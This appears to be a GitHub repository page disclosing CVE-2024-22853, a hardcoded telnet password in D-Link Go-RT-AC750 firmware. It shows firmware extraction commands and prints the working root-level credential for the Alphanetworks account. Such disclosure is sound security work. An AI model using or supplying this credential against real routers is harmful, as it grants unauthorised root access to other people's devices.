Skip to content
/ CVE-2024-22853 Public

D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

FaLLenSKiLL1/CVE-2024-22853

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2024-22853

D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.

PoC

https://www.dlink.com/se/sv/products/go-rt-ac750-wireless-ac750-dual-band-easy-router?revision=deu_reva#downloads

image

image

image

binwalk GORTAC750_A1_FW_v101b03.bin -e

image

cat './go-rt-ac750_fw_reva_1-01b03_eu_multi_20141017/_GORTAC750_A1_FW_v101b03.bin.extracted/squashfs-root/etc/init0.d/S80telnetd.sh'

image

image

image

Hardcoded Creds:

Alphanetworks:wrgac18_dlob.hans_ac750

About

D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published